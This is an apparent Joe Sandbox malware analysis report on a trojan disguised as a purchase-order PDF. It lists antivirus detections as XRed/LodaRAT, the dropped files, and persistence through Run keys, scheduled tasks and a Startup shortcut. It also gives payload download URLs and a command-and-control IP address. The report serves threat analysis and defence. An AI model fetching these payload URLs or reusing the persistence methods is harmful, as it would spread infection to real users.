Learning detection for dropped file 12->87 signatures6 process7 dnsIp8 57 drive.usercontent.google.com 142.250.185.65, 443, 49761, 49762 GOOGLEUS United States 19->57 59 docs.google.com 142.250.185.78, 443, 49741, 49742 GOOGLEUS United States 19->59 61 freedns.afraid.org 69.42.215.252, 49751, 80 AWKNET-LLCUS United States 19->61 37 C:\Users\user\Documents\IPKGELNTQY\~$cache1, PE32 19->37 dropped 75 Antivirus detection for dropped file 19->75 77 Multi AV Scanner detection for dropped file 19->77 79 Drops PE files to the document folder of the user 19->79 81 Machine Learning detection for dropped file 19->81 26 WerFault.exe 19->26         started        63 172.111.138.100, 49769, 49876, 49971 VOXILITYGB United States 24->63 39 C:\Users\user\AppData\Roaming\...\TXAASJ.exe, PE32 24->39 dropped 41 C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ASCII 24->41 dropped 28 cmd.exe 1 24->28         started        31 wscript.exe 24->31         started        file9 signatures10 process11 signatures12 89 Uses schtasks.exe or at.exe to add and modify task schedules 28->89 33 conhost.exe 28->33         started        35 schtasks.exe 28->35         started        91 Windows Scripting host queries suspicious COM object (likely to drop second stage) 31->91 process13

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              New PO - Supplier 16-12-2024-Pdf.exe81%VirustotalBrowse
                              New PO - Supplier 16-12-2024-Pdf.exe92%ReversingLabsWin32.Trojan.Synaptics
                              New PO - Supplier 16-12-2024-Pdf.exe100%AviraTR/Dldr.Agent.SH
                              New PO - Supplier 16-12-2024-Pdf.exe100%AviraHEUR/AGEN.1353217
                              New PO - Supplier 16-12-2024-Pdf.exe100%AviraW2000M/Dldr.Agent.17651006
                              New PO - Supplier 16-12-2024-Pdf.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe100%AviraHEUR/AGEN.1353217
                              C:\ProgramData\Synaptics\RCX6FCE.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCX6FCE.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraHEUR/AGEN.1353217
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\AppData\Local\Temp\BBLXFG.vbs100%AviraVBS/Runner.VPJI
                              C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe100%AviraHEUR/AGEN.1353217
                              C:\Users\user\Documents\IPKGELNTQY\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\IPKGELNTQY\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX6FCE.tmp100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe100%Joe Sandbox ML
                              C:\Users\user\Documents\IPKGELNTQY\~$cache1100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX6FCE.tmp92%ReversingLabsWin32.Worm.Zorex
                              C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe87%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe87%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\Documents\IPKGELNTQY\~$cache192%ReversingLabsWin32.Worm.Zorex

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              https://drive.userc0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/SUpdate.ini0100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SSLLibrary.dl100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              		69.42.215.252
                              		truefalse
                                		high
                                docs.google.com
                                		142.250.185.78
                                		truefalse
                                  		high
                                  drive.usercontent.google.com
                                  		142.250.185.65
                                  		truefalse
                                    		high
                                    xred.mooo.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      xred.mooo.comfalse
                                        		high
                                        http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://docs.google.com/ckground-size:100%Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://xred.site50.net/syn/SUpdate.ini0New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.usercontent.google.com/-Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://xred.site50.net/syn/Synaptics.rarSynaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.usercSynaptics.exe, 00000003.00000002.2678740944.000000000EDA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://docs.google.com/Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.000000000060A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2688843389.000000000EFBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.google.com/google.com/Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://xred.site50.net/syn/SSLLibrary.dlNew PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.google.com/google.com/SSynaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://xred.site50.net/syn/SUpdate.iniSynaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.2694610616.000000001023E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2711091391.000000001968E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2699875581.0000000012D7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2668420509.000000000ACFE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787Synaptics.exe, 00000003.00000002.2645686279.00000000005FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://xred.site50.net/syn/SSLLibrary.dllSynaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlNew PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://docs.google.com/DataSynaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        142.250.185.78
                                                                                        		docs.google.comUnited States
                                                                                        		15169GOOGLEUSfalse
                                                                                        172.111.138.100
                                                                                        		unknownUnited States
                                                                                        		3223VOXILITYGBtrue
                                                                                        69.42.215.252
                                                                                        		freedns.afraid.orgUnited States
                                                                                        		17048AWKNET-LLCUSfalse
                                                                                        142.250.185.65
                                                                                        		drive.usercontent.google.comUnited States
                                                                                        		15169GOOGLEUSfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1582347
                                                                                        Start date and time:2024-12-30 11:39:32 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 9m 13s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:23
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:New PO - Supplier 16-12-2024-Pdf.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.expl.evad.winEXE@21/50@9/4
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 41
                                                                                        • Number of non-executed functions: 309
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 184.28.90.27, 20.189.173.10, 13.89.179.12, 13.107.246.45, 40.126.32.133, 4.245.163.56, 173.222.162.64
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdwus09.westus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        05:40:35API Interceptor308x Sleep call for process: Synaptics.exe modified
                                                                                        05:41:15API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                        11:40:27AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        11:40:29Task SchedulerRun new task: BBLXFG.exe path: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                        11:40:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BBLXFG "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                        11:40:44AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnk
                                                                                        11:40:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BBLXFG "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        172.111.138.100Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                            test.msiGet hashmaliciousLodaRATBrowse
                                                                                              FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                  LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                    JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                        Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                          AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            69.42.215.252Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            docx.msiGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            222.msiGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            freedns.afraid.orgSupplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            docx.msiGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            222.msiGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            VOXILITYGBSupplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            test.msiGet hashmaliciousLodaRATBrowse
                                                                                                            • 172.111.138.100
                                                                                                            FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                            • 172.111.138.100
                                                                                                            LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            AWKNET-LLCUSSupplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            docx.msiGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            222.msiGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            37f463bf4616ecd445d4a1937da06e19Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            docx.msiGet hashmaliciousXRedBrowse
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            222.msiGet hashmaliciousXRedBrowse
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\ProgramData\Synaptics\RCX6FCE.tmpPurchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                              hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                222.msiGet hashmaliciousXRedBrowse
                                                                                                                  Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):118
                                                                                                                      Entropy (8bit):3.5700810731231707
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                      MD5:573220372DA4ED487441611079B623CD
                                                                                                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_3323f08b4d67f24a49dcac47a8ac8f69775d6939_455b7b6e_26038c68-fdda-488d-88dd-031cc2e91acb\Report.wer

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):1.1346124675731957
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:jWLVpsfI4b0BU/3DzJDzqjLOA/FwiRfzuiFLZ24IO8EKDzy:6yfXoBU/3JqjPJzuiFLY4IO8zy
                                                                                                                      MD5:98479734B891A48E3DEADDB28B4E5653
                                                                                                                      SHA1:4BEFDA05457ADDB4EEB4BCBD75AF6E9523AB6620
                                                                                                                      SHA-256:E812FCDD8BE555DBC9150AEC130066F275009D804D80698B3E4B1242030AC573
                                                                                                                      SHA-512:E652E6795BBF8806FEFB098F36440CC2246F9674CB0A69C983D8169874F2E8AEDA3C8A9D19070A5FD1A61545619655D8E24C9D08672812893B2DB1837D76B3B1
                                                                                                                      Malicious:false
                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.8.8.6.7.5.5.0.1.7.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.8.8.7.3.5.5.0.1.7.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.0.3.8.c.6.8.-.f.d.d.a.-.4.8.8.d.-.8.8.d.d.-.0.3.1.c.c.2.e.9.1.a.c.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.6.4.9.7.d.3.-.4.c.f.0.-.4.b.1.e.-.a.9.3.e.-.c.9.7.f.2.e.6.5.6.5.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.9.c.-.0.0.0.1.-.0.0.1.5.-.4.e.2.4.-.7.0.3.d.a.7.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2554.tmp.WERInternalMetadata.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6336
                                                                                                                      Entropy (8bit):3.7207419136362283
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:R6l7wVeJ0xF6RGYik4clpri89bwWsfbQm:R6lXJ66RGYt4cTw1fJ
                                                                                                                      MD5:4464D6BA1B119B90C0DD20D3AFE07514
